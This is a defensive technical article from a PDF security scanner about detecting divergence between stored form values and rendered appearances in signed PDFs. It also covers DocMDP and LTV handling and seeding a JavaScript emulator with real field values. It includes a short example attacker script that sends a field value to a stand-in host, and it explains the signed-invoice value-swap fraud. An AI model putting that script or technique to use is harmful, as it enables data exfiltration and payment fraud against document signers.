Background: Two Data Paths, One Signature
Marc Kaufman retired from Adobe having worked on every version of Acrobat from 2 through 12. He submitted a feedback report through our contact form pointing at a linearization gap in our scanner — our incremental-update detection used a set difference to find injected objects, which silently passed redefined objects carrying the same ID. We fixed it. He then pointed at MDP. We fixed that. He then asked how deep into the V/AP woods we wanted to go.
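The set-difference gap is easy to see in miniature. The sketch below is illustrative and is not the scanner's code. It assumes each revision has already been parsed into a Map from an object ID string (object and generation number) to the raw object body. The function names are hypothetical.

```javascript
// Illustrative only: each revision is assumed to be a Map of
// "objNum genNum" -> raw object body, produced by a parser not shown here.

// Set difference: only IDs missing from the base revision count as injected.
function injectedBySetDifference(base, update) {
  return [...update.keys()].filter((id) => !base.has(id));
}

// Per-ID comparison: also reports IDs the update redefines with a new body.
function changedObjects(base, update) {
  const added = [];
  const redefined = [];
  for (const [id, body] of update) {
    if (!base.has(id)) added.push(id);
    else if (base.get(id) !== body) redefined.push(id);
  }
  return { added, redefined };
}

const base = new Map([
  ["5 0", "<< /FT /Tx /T (amount) /V (1,200.00) >>"],
  ["6 0", "<< /Type /Page >>"],
]);
// The incremental update reuses object 5 0 with a different /V.
const update = new Map([["5 0", "<< /FT /Tx /T (amount) /V (12,000.00) >>"]]);

console.log(injectedBySetDifference(base, update)); // [] : nothing flagged
console.log(changedObjects(base, update).redefined); // [ '5 0' ]
```

Comparing raw bodies is deliberately conservative. A byte-for-byte rewrite of an unchanged object also shows up as redefined, which is noise rather than a miss.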
The answer to that question is the subject of this article.
Every AcroForm field has two independent data stores:
| Key | What it contains | Who reads it |
|---|---|---|
| /V | The machine-readable field value | JavaScript (doc.getField().value), form submission (SubmitForm), any pipeline that extracts form data |
| /AP /N | A self-contained PDF content stream that the viewer renders as pixels | The viewer, and through it the user |
These two stores are not derived from each other: authoring tools normally generate
/AP from /V, but nothing in the file format enforces it. A PDF author can set
/V to (I agree to transfer $1,000) and author an /AP
stream that renders I agree to transfer $10. The user signs what they see.
The signature covers both. The value that downstream systems read and the value the
signer saw differ by construction, and both sit inside the certified byte range.
Known Exploitation Patterns
The V/AP gap has been documented in both academic research and operational fraud. In 2021, researchers at Ruhr University Bochum published “Shadow Attacks: Hiding and Replacing Content in Signed PDFs,” demonstrating that content can be concealed inside a signed byte range — invisible to signature validators, visible to the rendering viewer. The disclosure reached 28 PDF viewer vendors and produced patches in Adobe Acrobat, Foxit, and others. The attack class directly exploits the V/AP separation described here: placing different content in the display layer than in the data layer, both within the certified range.
In operational settings, the same mechanism appears in
a simpler form. Signed invoice PDFs where an automated payment system reads
/V while the human signer saw what /AP rendered are a
documented pattern in business email compromise campaigns. A field that displays
“$1,200.00” to the signer while /V holds
“$12,000.00” survives signature validation intact.
Several concrete vulnerability patterns exploit the AcroForm field model and are detected by this scanner:
| CVE | Pattern | Mechanism |
|---|---|---|
| CVE-2021-28550 | AcroForm + getField / setFocus JavaScript | Use-after-free in Acrobat’s form field manipulation path, triggered by specific getField() and setFocus() call sequences in AcroForm JavaScript |
| CVE-2021-21017 | XFA + JavaScript + instanceManager | Heap buffer overflow via XFA form handling; exploited in the wild before patching. XFA is deprecated in PDF 2.0 but still rendered by Acrobat |
| CVE-2024-45112 | XFA/AcroForm mixed field access | Type confusion triggered when a document mixes XFA and AcroForm field access in the same session, a pattern rarely seen in legitimately authored forms |
| CVE-2023-21608 | Annotation + event.target JavaScript | Use-after-free in the annotation engine triggered via event.target references in AcroForm field event handlers (CVSS 7.8) |
XFA-based forms more broadly have been observed in malware campaigns abusing FormCalc and JavaScript execution triggered at document open — a delivery mechanism less visible to scanners that focus on AcroForm JavaScript paths and do not inspect XFA-embedded scripting separately.
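Inspecting XFA scripting separately mostly means looking inside the XFA XML itself. The following is a rough sketch under three assumptions:

- The XFA packets have already been extracted and concatenated into one string.
- A regex is good enough here, even though a production scanner would use an XML parser.
- Per the XFA specification, a script element without a contentType attribute is FormCalc.

```javascript
// Rough sketch: list <script> elements in an XFA template packet.
// A regex scan is a heuristic; a production scanner would parse the XML.
function findXfaScripts(xfaXml) {
  const scripts = [];
  const scriptRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let match;
  while ((match = scriptRe.exec(xfaXml)) !== null) {
    const type = /contentType\s*=\s*["']([^"']+)["']/i.exec(match[1]);
    scripts.push({
      // No contentType attribute means FormCalc in XFA.
      contentType: type ? type[1] : "application/x-formcalc",
      body: match[2].trim(),
    });
  }
  return scripts;
}

const xfa =
  '<field name="f1"><event activity="initialize">' +
  '<script contentType="application/x-javascript">app.alert(1);</script>' +
  '</event><event activity="initialize"><script>$.rawValue = "x"</script></event></field>';

for (const s of findXfaScripts(xfa)) console.log(s.contentType, s.body);
```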
Five Structural Indicators: V/AP Divergence Without Rendering
The fundamental constraint for deterministic V/AP analysis is avoiding the renderer. Rasterising a field region and running OCR introduces renderer-specific differences, font fallback differences, DPI-dependent text segmentation, OCR nondeterminism, and false-positive rates that are incompatible with forensic guarantees. Every indicator below derives from the raw PDF object model, reproducibly, without opening the file in a viewer.
/NeedAppearances True
When /NeedAppearances true is present in the AcroForm dictionary
(ISO 32000 §12.7.2), the viewer is instructed to regenerate /AP
from /V at open time. The /AP streams stored on disk are
stale by construction: the flag tells the viewer not to rely on them, and nothing requires them to reflect /V. On its own this
is medium severity: stale AP is common in programmatic form-fill workflows (mail merge,
DocuSign) that update /V but skip AP regeneration before saving.
Combined with a digital signature it is critical.
The byte-range hash covers the stored /AP, but the viewer discards it and regenerates the
appearance after opening. The appearance on screen is therefore never the appearance the
signature certifies. It is produced by the viewer's own regeneration logic, and the stored
stream inside the certified bytes can be authored to show something else entirely.
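As a sketch, the severity logic reduces to two raw-text tests. The sketch makes these simplifications:

- The AcroForm dictionary has already been resolved to its raw text.
- A signature is recognised by a /ByteRange array anywhere in the file.
- An indirect /NeedAppearances value is not followed.

```javascript
// Sketch: /NeedAppearances severity from raw PDF text.
// Simplifications: direct boolean values only; a signature is assumed to be
// present when any /ByteRange array appears in the file.
function hasSignature(pdfText) {
  return /\/ByteRange\s*\[/.test(pdfText);
}

function needAppearancesSeverity(acroFormDict, pdfText) {
  if (!/\/NeedAppearances\s+true\b/.test(acroFormDict)) return null;
  return hasSignature(pdfText) ? "critical" : "medium";
}

const acroForm = "<< /Fields [4 0 R] /NeedAppearances true >>";
console.log(needAppearancesSeverity(acroForm, acroForm)); // medium
console.log(needAppearancesSeverity(acroForm, acroForm + " /ByteRange [0 840 960 240]")); // critical
```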
Checkbox and Radio: /V vs /AS Key Comparison
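For checkbox and radio button fields, /AS (Appearance State) selects
which entry in /AP /N the viewer renders, and /V is the stored
data value. Both are name objects. /AS lives in the widget annotation dictionary.
/V lives in the field dictionary, which for a simple checkbox is often merged with its
single widget and for a radio group is the parent of the widgets. We extract both
via regex against the raw object bodies located through the cross-reference table and
compare them as strings: no rendering, no approximation.
If /V is /Yes and
/AS is /Off, the displayed state and the stored value
structurally disagree, and that fact is in the file regardless of any viewer. For a
radio group the comparison runs across the kids: the widget whose on-state matches
/V should show it, and its siblings should be /Off. This is
the most deterministic V/AP check possible: a pure dictionary key comparison.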
In a signed document both /V and
/AS fall within the signed byte range, so the mismatch itself is part of the
certified content.
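The comparison can be sketched over raw dictionary text. The illustration makes these assumptions:

- The dictionaries have already been located and resolved.
- Names contain no #-escapes.
- An absent /V or /AS is read as /Off.

For a radio group, /V sits on the parent field and /AS sits on each kid widget, so the check spans the kids.

```javascript
// Sketch: /V vs /AS comparison on raw dictionary text.
// Assumptions: dictionaries already resolved to strings, no #-escaped names,
// and a missing /V or /AS is treated as /Off.
function nameEntry(dict, key) {
  const m = new RegExp(`/${key}\\s*/([^\\s/<>\\[\\]()]+)`).exec(dict);
  return m ? m[1] : "Off";
}

// Checkbox whose field and widget share one dictionary.
function checkboxMismatch(dict) {
  return nameEntry(dict, "V") !== nameEntry(dict, "AS");
}

// Radio group: /V on the parent, /AS on each kid. Consistent when every kid
// that is "on" shows exactly the /V state and, unless /V is /Off, at least one does.
function radioMismatch(parentDict, kidDicts) {
  const v = nameEntry(parentDict, "V");
  const on = kidDicts.map((k) => nameEntry(k, "AS")).filter((s) => s !== "Off");
  if (v === "Off") return on.length > 0;
  return on.length === 0 || on.some((s) => s !== v);
}

console.log(checkboxMismatch("<< /FT /Btn /V /Yes /AS /Off >>")); // true
console.log(radioMismatch("<< /FT /Btn /V /B >>", ["<< /AS /Off >>", "<< /AS /B >>"])); // false
```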
AP Stream Text Extraction: Text, Listbox, Combobox
For text fields, listboxes, and comboboxes, the /AP /N stream is a
PDF content stream containing text drawing operators. We decompress it via PyMuPDF,
extract Tj, TJ, and ' operators, reconstruct
the display string, PDF-unescape it, whitespace-normalise it, and compare it to
/V.
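A simplified version of that extraction fits in a small tokenizer. It is not the scanner's implementation, and it makes these assumptions:

- The stream is already decompressed.
- Character codes are single-byte Latin-1, so font encodings and CMaps are ignored.
- Separate text-showing operations are joined with a space.
- The " operator is also counted, since it shows text the same way ' does.

```javascript
// Sketch: rebuild the displayed string from a decompressed /AP /N stream.
// Assumptions: single-byte codes read as Latin-1 (no font encodings/CMaps),
// no comments in the stream, separate show operations joined with a space.

function unescapeLiteral(raw) {
  const simple = { n: "\n", r: "\r", t: "\t", b: "\b", f: "\f" };
  let out = "";
  for (let i = 0; i < raw.length; i++) {
    if (raw[i] !== "\\") { out += raw[i]; continue; }
    const next = raw[++i];
    if (next === undefined) break;
    const oct = /^[0-7]{1,3}/.exec(raw.slice(i, i + 3));
    if (oct) { out += String.fromCharCode(parseInt(oct[0], 8) & 0xff); i += oct[0].length - 1; }
    else if (next in simple) out += simple[next];
    else if (next === "\r") { if (raw[i + 1] === "\n") i++; } // escaped line break
    else if (next !== "\n") out += next; // \( \) \\ and unknown escapes
  }
  return out;
}

const SHOW_OPS = new Set(["Tj", "TJ", "'", '"']);

function extractApText(stream) {
  const shown = [];
  let operands = []; // string operands seen since the last operator
  let i = 0;
  while (i < stream.length) {
    const c = stream[i];
    if (c === "(") {
      // Literal string with balanced parentheses and backslash escapes.
      let depth = 1, j = i + 1, raw = "";
      while (j < stream.length) {
        const d = stream[j];
        if (d === "\\") { raw += d + (stream[j + 1] ?? ""); j += 2; continue; }
        if (d === "(") depth++;
        if (d === ")" && --depth === 0) break;
        raw += d;
        j++;
      }
      operands.push(unescapeLiteral(raw));
      i = j + 1;
    } else if (c === "<") {
      if (stream[i + 1] === "<") { i += 2; continue; } // dictionary, not a string
      const end = stream.indexOf(">", i);
      if (end === -1) break;
      const hex = stream.slice(i + 1, end).replace(/\s+/g, "");
      operands.push(Buffer.from(hex.length % 2 ? hex + "0" : hex, "hex").toString("latin1"));
      i = end + 1;
    } else if (/[A-Za-z'"]/.test(c)) {
      let j = i + 1;
      while (j < stream.length && /[A-Za-z*]/.test(stream[j])) j++;
      if (SHOW_OPS.has(stream.slice(i, j))) shown.push(operands.join(""));
      operands = [];
      i = j;
    } else {
      i++; // numbers, the "/" of names, array brackets, whitespace
    }
  }
  return shown.join(" ").replace(/\s+/g, " ").trim();
}

console.log(extractApText("BT /Helv 12 Tf (I agree to transfer $10) Tj ET")); // I agree to transfer $10
```

TJ arrays are concatenated without kerning, so a string split for kerning such as [(Hel) -20 (lo)] comes back as one word.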
Three encoding cases are handled:
- Literal string /V: /V (Hello), extracted directly
- Hex-string /V: /V <48656c6c6f>, decoded via bytes.fromhex(); UTF-16BE (BOM FEFF) detected and decoded correctly
- Listbox multi-select array: /V [(opt1) (opt2)] or [<hex1> <hex2>], elements joined for comparison
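The three cases can be sketched as one decoder. It makes these assumptions:

- The raw /V value is available as Latin-1 text.
- Non-Unicode strings are read as Latin-1, which approximates PDFDocEncoding but differs in a few code points.
- Array elements are joined with a single space.
- Literal strings inside arrays contain no unescaped nested parentheses.

UTF-16BE detection applies to literal strings as well as hex strings.

```javascript
// Sketch: decode a raw /V value (literal, hex, or array of either) to text.

// PDF text strings starting with the FE FF byte-order mark are UTF-16BE;
// anything else is read as Latin-1 here (approximating PDFDocEncoding).
function decodeTextBytes(bytes) {
  if (bytes.length >= 2 && bytes[0] === 0xfe && bytes[1] === 0xff) {
    // Copy the even-length body after the BOM, then swap to little-endian.
    const body = Buffer.from(bytes.subarray(2, bytes.length - ((bytes.length - 2) % 2)));
    return body.swap16().toString("utf16le");
  }
  return bytes.toString("latin1");
}

// Literal-string escapes: \n \r \t \b \f \( \) \\, octal \ddd, escaped line breaks.
function literalToBytes(body) {
  const simple = { n: 10, r: 13, t: 9, b: 8, f: 12 };
  const out = [];
  for (let i = 0; i < body.length; i++) {
    if (body[i] !== "\\") { out.push(body.charCodeAt(i) & 0xff); continue; }
    const next = body[++i];
    if (next === undefined) break;
    const oct = /^[0-7]{1,3}/.exec(body.slice(i, i + 3));
    if (oct) { out.push(parseInt(oct[0], 8) & 0xff); i += oct[0].length - 1; }
    else if (next in simple) out.push(simple[next]);
    else if (next === "\r") { if (body[i + 1] === "\n") i++; }
    else if (next !== "\n") out.push(next.charCodeAt(0) & 0xff);
  }
  return Buffer.from(out);
}

function decodeV(raw) {
  const v = raw.trim();
  if (v.startsWith("[")) {
    // Multi-select listbox: decode each element, then join.
    const items = v.match(/\((?:\\[\s\S]|[^\\)])*\)|<[0-9A-Fa-f\s]*>/g) ?? [];
    return items.map(decodeV).join(" ");
  }
  if (v.startsWith("<")) {
    const hex = v.slice(1, -1).replace(/\s+/g, "");
    return decodeTextBytes(Buffer.from(hex.length % 2 ? hex + "0" : hex, "hex"));
  }
  if (v.startsWith("(")) return decodeTextBytes(literalToBytes(v.slice(1, -1)));
  return v; // anything else (e.g. a name) is returned unchanged
}

console.log(decodeV("<FEFF00480069>")); // Hi
```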
For listbox and combobox fields, /Opt can
store export/display pairs: [[(us) (United States)] [(uk) (United Kingdom)]].
The first element of each pair is the export value and the second is the label shown
to the user. The /V holds the export value (us); the /AP
renders the display label (United States). Without resolving this map,
every legitimately authored dropdown using export-value pairs would fire a false
positive. We build an export→display map from /Opt and substitute
the display label as the comparison target before checking.
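Here is a sketch of the substitution. It assumes /Opt has already been parsed into JavaScript strings and two-element arrays. It follows the ISO 32000 convention that a two-element entry is [export value, display text] and that a plain string entry serves as both. Values with no /Opt entry are compared as-is, and joining multi-select values with a space is an assumption of the sketch.

```javascript
// Sketch: map /V export values to the labels the AP stream should show.
// Assumes /Opt is already parsed: each entry is a string or [export, display].
function optExportToDisplay(opt) {
  const map = new Map();
  for (const entry of opt) {
    if (Array.isArray(entry)) map.set(entry[0], entry[1]);
    else map.set(entry, entry); // a plain string is both export value and label
  }
  return map;
}

// Expected AP text for a /V that may be a single value or a multi-select array.
function expectedDisplay(v, opt) {
  const map = optExportToDisplay(opt);
  const values = Array.isArray(v) ? v : [v];
  return values.map((x) => map.get(x) ?? x).join(" ");
}

const opt = [["us", "United States"], ["uk", "United Kingdom"]];
console.log(expectedDisplay("us", opt)); // United States
console.log(expectedDisplay(["us", "uk"], opt)); // United States United Kingdom
```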
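When the /AP stream exists but contains
no text drawing operators at all, we flag it separately: the value is present in the
file and covered by any signature, but the field shows no text to the user. A stream
that paints glyphs as vector paths or as an image would also be flagged here, because
this check does not inspect such content.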
Value Set, No AP Defined
When /V is non-empty but no /AP stream exists, the viewer
falls back to the field’s /DA (Default Appearance) and constructs
a rendering itself. The displayed content is viewer-defined — it is not
statically present in the file. Different viewers may render different things.
Medium severity.
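The two fallback conditions can be sketched as one classifier that runs before any text comparison: an AP stream with no text operators, and a value with no AP at all. It takes two inputs, both assumptions of the sketch:

- vText is the decoded /V, empty if absent.
- apStream is the decompressed /AP /N content, or null when the widget has no /AP.

String operands are blanked out first, so an apostrophe inside displayed text is not mistaken for the ' operator.

```javascript
// Sketch: classify the two fallback cases before comparing text.
// vText: decoded /V ("" when absent); apStream: decompressed /AP /N or null.
function classifyAppearance(vText, apStream) {
  if (!vText) return null; // no value, nothing to diverge from
  if (apStream === null) {
    return { check: "missing-ap", severity: "medium" }; // display is viewer-defined via /DA
  }
  // Blank out string operands so their contents cannot look like operators.
  const ops = apStream
    .replace(/\((?:\\[\s\S]|[^\\)])*\)/g, "()")
    .replace(/<[0-9A-Fa-f\s]*>/g, "<>");
  const showsText = /\bT[jJ]\b|['"](?=\s|$)/.test(ops);
  if (!showsText) {
    // Glyphs painted as paths or images would also land here.
    return { check: "blank-ap", severity: "medium" };
  }
  return null; // text present: proceed to the AP text vs /V comparison
}

console.log(classifyAppearance("42", "q 0 0 100 20 re f Q")); // { check: 'blank-ap', severity: 'medium' }
```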
Correlation Engine Compound Patterns
Four compound indicators in the weighted correlation engine (Engine 44) fire on combinations:
| Combination | Severity | Why |
|---|---|---|
| /NeedAppearances + digital signature | Critical | Signed bytes cover a stored appearance that the viewer discards and regenerates, so the displayed appearance is not the certified one |
| V/AS mismatch + digital signature | Critical | Displayed state and certified value structurally differ within the same signed byte range |
| /NeedAppearances + JS or SubmitForm | High | Stale AP paired with active form content: the displayed values may differ from what is executed or exfiltrated |
| /NeedAppearances + DocMDP constraint violation | Critical | Uncertified modification rendered visible via viewer-regenerated appearance |
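Expressed as data, the four rules are simple set tests. This sketch models only which combinations fire and at what severity. The indicator names are hypothetical labels. The engine's weighting is not described here and is not modelled.

```javascript
// Sketch: the four compound rules as data. Indicator names are hypothetical.
const COMPOUND_RULES = [
  { name: "NeedAppearances + signature", all: ["needAppearances", "signature"], severity: "critical" },
  { name: "V/AS mismatch + signature", all: ["vAsMismatch", "signature"], severity: "critical" },
  { name: "NeedAppearances + JS or SubmitForm", all: ["needAppearances"], any: ["javascript", "submitForm"], severity: "high" },
  { name: "NeedAppearances + DocMDP violation", all: ["needAppearances", "docMdpViolation"], severity: "critical" },
];

// Returns every compound rule whose required indicators are all present
// (and, where "any" is given, at least one of those as well).
function compoundFindings(indicators) {
  const has = (name) => indicators.has(name);
  return COMPOUND_RULES
    .filter((rule) => rule.all.every(has) && (!rule.any || rule.any.some(has)))
    .map(({ name, severity }) => ({ name, severity }));
}

const found = compoundFindings(new Set(["needAppearances", "signature", "submitForm"]));
console.log(found.map((f) => `${f.severity}: ${f.name}`));
```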
Normal Interactive PDFs vs. Suspicious Patterns
AcroForms, JavaScript, and automatic actions are standard PDF features used
legitimately in millions of documents every day. A sign-and-submit button uses
JavaScript. A government tax form uses an AcroForm with /SubmitForm.
An e-signature platform uses DocMDP to certify the signed content. A mail-merge
system may legitimately produce documents with /NeedAppearances true
because it updates /V programmatically without regenerating
/AP. None of that is inherently suspicious.
The checks in this article target a specific subset of structural conditions that are rarely present in legitimately authored documents and frequently present in documents where the display and data layers have been deliberately decoupled:
| Feature | Normal use | Suspicious pattern |
|---|---|---|
| AcroForm + JavaScript | Field validation, conditional field visibility, submit-to-URL on a known endpoint | Field value read and posted to an external URL not visible in the document; conditional branch taken only when a specific field equals a pre-seeded value |
| /NeedAppearances true | Programmatic form fill where AP regeneration is deferred (DocuSign, mail merge) | /NeedAppearances true combined with a digital signature: the certified bytes cover a stored appearance that the viewer replaces with its own |
| /V vs /AS on a checkbox | Should always match in a well-formed document | Structural mismatch: /V /Yes but /AS /Off; the stored value and displayed state disagree by construction |
| AP stream text vs /V | Should agree after /Opt export-value resolution | AP renders “Approved” while /V holds “Rejected”; or AP stream is blank while /V is non-empty |
| DocMDP P=1 + incremental update | DSS/LTV additions permitted under ISO 32000-2 §12.8.2.2 | Incremental update containing form modifications, annotations, JavaScript, or OpenAction after a P=1 certifying signature |
A scanner finding a V/AP mismatch is not saying “this form is dangerous.” It is saying the file contains a structural condition that is worth examining: the value in the file and the value the viewer renders do not agree, and in a signed document that disagreement sits inside the certified byte range. Whether the cause is a buggy form authoring tool, a careless programmatic fill, or a deliberate manipulation is a question the indicator raises, not one it answers.
JavaScript Field-Value Conditioning: A Behavioral Analysis Gap
JavaScript behavioral emulation executes extracted PDF JavaScript in a sandboxed
Node.js vm context with a stub of the Acrobat API. The gap documented
here is not specific to any one implementation — it applies to any behavioral
sandbox that does not seed doc.getField() with real /V
values from the file. Previously, a stub returning { value: '' }
for every field was a common default.
The practical consequence: when malicious JavaScript
reads a field value and acts on it — submitting it to a URL, using it in a
conditional branch, passing it to app.launchURL() — the emulator
captured the event with an empty string rather than the actual content. Exploitation
chains conditioned on field values were not followed correctly:
```javascript
// Attacker JS inside the PDF (Acrobat JavaScript API)
if (doc.getField('status').value == 'approved') {
  app.launchURL('https://attacker.example/c2?v=' + doc.getField('amount').value);
}
```
With value: '', the condition
'' == 'approved' is false — the branch is never taken, the
LAUNCH_URL event is never emitted, and the emulator reports clean.
The correct approach: the AcroForm field enumeration
pass collects a field_values map (field name → /V string)
during widget traversal. The behavioral emulator reads this map and prepends
const _pq_fv = {...}; to the stub before execution.
doc.getField(name) returns the real value from the file;
doc.numFields reflects the true field count.
SUBMIT_FORM and LAUNCH_URL events carry the actual
field content. Signature fields are excluded: their /V is a signature dictionary
whose /Contents holds a PKCS#7 blob, not a meaningful string.
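Here is a minimal sketch of the seeding idea using Node's vm module. It differs from the description above in two ways, both assumptions of the sketch:

- The field map is passed in through the context object rather than prepended as a const _pq_fv literal. The effect on getField() is the same.
- The stubbed API covers only the few calls the example needs, and fieldValueMap's input shape is hypothetical.

Node's own documentation states that vm is not a security mechanism, so real untrusted code needs process-level isolation around it.

```javascript
const vm = require("vm");

// Build the field-name -> /V map, skipping signature fields (their /V is a
// signature dictionary, not text). `fields` is a hypothetical parsed list.
function fieldValueMap(fields) {
  return Object.fromEntries(
    fields.filter((f) => f.type !== "Sig").map((f) => [f.name, f.value])
  );
}

// Run extracted PDF JavaScript against a stub that returns real field values
// and records the side effects a scanner cares about. Pass the file's total
// field count as numFields when it differs from the seeded map's size.
function emulate(script, fieldValues, numFields = Object.keys(fieldValues).length) {
  const events = [];
  const doc = {
    numFields,
    getField(name) {
      if (!Object.prototype.hasOwnProperty.call(fieldValues, name)) return null;
      return { name, value: fieldValues[name] };
    },
    submitForm(target) { events.push({ type: "SUBMIT_FORM", target }); },
  };
  const app = {
    launchURL(url) { events.push({ type: "LAUNCH_URL", url }); },
  };
  // vm is not a sandbox for hostile code; the timeout only stops runaway loops.
  vm.runInNewContext(script, { doc, app }, { timeout: 1000 });
  return events;
}

const attackerJs = `
if (doc.getField('status').value == 'approved') {
  app.launchURL('https://attacker.example/c2?v=' + doc.getField('amount').value);
}`;

// Empty-string stub: the branch is never taken, so no events are recorded.
console.log(emulate(attackerJs, { status: "", amount: "" }).length); // 0

// Seeded from the file: the LAUNCH_URL event carries the real amount.
const seeded = fieldValueMap([
  { name: "status", type: "Tx", value: "approved" },
  { name: "amount", type: "Tx", value: "12,000.00" },
  { name: "sig1", type: "Sig", value: "<signature dictionary>" },
]);
console.log(emulate(attackerJs, seeded)[0].url); // https://attacker.example/c2?v=12,000.00
```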
DocMDP P=1 and DSS/LTV: What ISO 32000-2 Actually Permits
DocMDP P=1 means the certifying signature permits no modifications to the document whatsoever: not form fill-ins, not annotations, nothing. A naive implementation flags any incremental object after a P=1 signature as a bypass attempt. The problem is that ISO 32000-2 explicitly carves out an exception that such an implementation ignores, so it misfires on a large class of legitimately authored documents.
Marc Kaufman pointed out the gap: ISO 32000-2 §12.8.2.2 NOTE 2 explicitly permits DSS (Document Security Store) and LTV (Long Term Validation) additions in an incremental update even under P=1.
DSS carries the material required to validate a digital signature after the signing certificate’s OCSP responder or CRL distribution point has gone offline: OCSP responses, certificate revocation lists, and the full certificate chain. Adding this material after signing is a standard PAdES workflow and does not modify the certified document content in any MDP sense. Before the fix, every legitimately LTV-enabled P=1 document was flagged critical.
The fix detects DSS-only incremental updates: the
section contains /DSS or /VRI and has no execution vectors
(no JavaScript, no /OpenAction), no annotations, no form elements, and
no /AA additional actions. When P=1 and the incremental section is
DSS-only, the scanner emits a low-severity informational note citing the spec section
rather than a bypass finding. If DSS is mixed with any document modification or
execution vector, the full bypass indicator fires as before.
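The classification can be sketched over raw object bodies. It makes these assumptions:

- update maps each object ID in the incremental section to its dictionary text. Stream data is excluded, since binary certificate bytes could match the patterns by accident.
- previous holds the same IDs from the signed revision.
- A redefined object is accepted only when it is the catalog gaining a /DSS reference.

The sketch does not model a later LTV update that rewrites an existing DSS dictionary, which a real implementation would need to handle.

```javascript
// Sketch: is a post-P=1 incremental section a DSS-only (LTV) update?
// Markers that make an update more than DSS/LTV material.
const FORBIDDEN = [
  /\/(?:JS|JavaScript)\b/,          // JavaScript
  /\/OpenAction\b/,
  /\/AA\b/,                          // additional actions
  /\/Annots?\b|\/Widget\b/,          // annotations, including form widgets
  /\/FT\b|\/Fields\b|\/AcroForm\b/,  // form elements
];

const normalise = (s) => s.replace(/\s+/g, " ").trim();

function classifyP1Update(update, previous) {
  let hasDss = false;
  for (const [id, body] of update) {
    if (/\/(?:DSS|VRI)\b/.test(body)) hasDss = true;
    if (previous.has(id)) {
      // Redefined object: only a catalog that merely gains /DSS n g R is allowed.
      const withoutDss = body.replace(/\/DSS\s+\d+\s+\d+\s+R/, "");
      if (normalise(withoutDss) !== normalise(previous.get(id))) return "bypass";
      continue;
    }
    // New object: must not carry execution vectors, annotations or form elements.
    if (FORBIDDEN.some((re) => re.test(body))) return "bypass";
  }
  return hasDss ? "dss-only" : "bypass";
}

const prev = new Map([
  ["1 0", "<< /Type /Catalog /Pages 2 0 R /AcroForm 5 0 R >>"],
  ["4 0", "<< /Type /Page /Parent 2 0 R /Contents 7 0 R >>"],
]);
const ltv = new Map([
  ["1 0", "<< /Type /Catalog /Pages 2 0 R /AcroForm 5 0 R /DSS 9 0 R >>"],
  ["9 0", "<< /Certs [10 0 R] /OCSPs [11 0 R] >>"],
]);
console.log(classifyP1Update(ltv, prev)); // dss-only
```

A catalog whose keys were also reordered during the rewrite is reported as a bypass. That is a conservative false positive rather than a miss.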
Field MDP (FieldMDP, /TransformMethod /FieldMDP) is a distinct
transform from DocMDP. Where DocMDP applies a permission level to the entire
document, FieldMDP applies per-approval-signature constraints to named form
fields — specifying which fields are locked and which are not. Both are
detected separately. The DSS/LTV exemption applies to DocMDP P=1 only; FieldMDP
constraint validation is unchanged.
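The FieldMDP side can be sketched from its transform parameters. In ISO 32000, /Action is /All, /Include, or /Exclude, and /Fields lists field names. The sketch assumes both are already parsed. It also assumes modifiedFields holds the fully qualified names of fields changed after the signature. Producing that list is the hard part and is not shown.

```javascript
// Sketch: which post-signature field changes does a FieldMDP lock forbid?
// action: "All" | "Include" | "Exclude" (from /Action); fields: /Fields names.
function fieldMdpViolations(action, fields, modifiedFields) {
  const listed = new Set(fields);
  const isLocked = (name) => {
    switch (action) {
      case "All": return true;                  // every field is locked
      case "Include": return listed.has(name);  // only the listed fields are locked
      case "Exclude": return !listed.has(name); // everything except the listed fields
      default: throw new Error(`unknown FieldMDP /Action: ${action}`);
    }
  };
  return modifiedFields.filter(isLocked);
}

console.log(fieldMdpViolations("Include", ["buyer.name"], ["buyer.name", "notes"])); // [ 'buyer.name' ]
```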
Structural Limits: What Rasterisation Cannot Provide
The question Marc Kaufman asked — “how far into the woods do you want to go?” — has a principled answer. Rasterising a field region and running Tesseract against it is technically possible. For deterministic, reproducible forensic analysis that must produce consistent results on the same file across runs, it is the wrong approach for reasons that are architectural, not merely practical.
The problems with rasterisation in this context:
- Renderer-specific differences — MuPDF and Ghostscript render the same field differently
- Font fallback differences — missing fonts produce different glyphs on different systems
- DPI-dependent text segmentation — results change with render resolution
- OCR nondeterminism — the same raster produces different strings across runs
- Language-model bias — OCR engines correct toward plausible words, hiding injected content
- False-positive rates that break the guarantees a forensics engine must provide
- Unpredictable latency spikes on large form documents
Every case in which V/AP divergence is provable from the raw byte stream, that is, every case where the file and the display disagree by construction, is covered by the five checks above. The one case that is not covered is a custom font with a remapped encoding, where the glyph for character code 0x41 renders as “B” rather than “A”. Detecting that requires either running a renderer or parsing the font’s encoding tables and comparing them against the AP stream’s character codes. That is a separate engine, not a V/AP check.
An Open Question: DocMDP P=2 and Incremental Form Fill-ins
DocMDP P=2 permits form fill-ins and digital signatures but prohibits any other
modification. The interaction between P=2 and incremental form fill-ins is the one
area Marc flagged as worth thinking about further. The specific edge case: a
viewer that fills a form field incrementally under P=2, updating /V in
the incremental section, is permitted. A viewer that also regenerates the
/AP stream in the same incremental section may or may not be considered
a permitted modification depending on whether the validator treats AP regeneration as
a document change.
The practical consequence: a certified P=2 document
could have been legitimately filled, producing an incremental /AP update
that some validators accept and others reject. Our scanner currently flags all
incremental object additions under P=2 that contain form elements as potential
violations. Whether a specific update is legitimate depends on whether it was
generated by a compliant form-fill operation or by an attacker modifying fields
outside the permitted scope. We are tracking this as a known nuance, not a confirmed
false positive.
Safe Handling and Configuration
The technical findings above have practical consequences for anyone who receives, processes, or routes PDF forms. These are not theoretical edge cases — they apply to signed contracts, regulatory filings, and any workflow where a PDF form value is treated as authoritative.
For Individuals: Viewer Settings
- Disable JavaScript in Acrobat: Edit → Preferences → JavaScript → uncheck “Enable Acrobat JavaScript.” Most form functionality works without it; JavaScript is mainly needed for calculated fields, complex field validation, and multi-step wizards.
- Use Protected Mode / Protected View: Acrobat Reader’s Protected Mode (Windows, enabled by default since Reader X) sandboxes the renderer in a low-privilege process. Confirm it is active under Edit → Preferences → Security (Enhanced). Disable “trust files in my Documents folder” if you receive external forms.
- Open in a browser for untrusted files: Chrome (PDFium) and Firefox (pdf.js) implement only a limited subset of the Acrobat JavaScript API and run it inside the browser’s sandbox; Firefox’s support can be switched off with the pdfjs.enableScripting preference. This does not prevent V/AP divergence from affecting the display, but it sharply reduces the JavaScript execution surface.
- Verify fields independently: For any signed document where field values are legally or financially significant, export the form data as FDF or XFDF and confirm that the exported values match what you see on screen.
For Developers and Pipelines
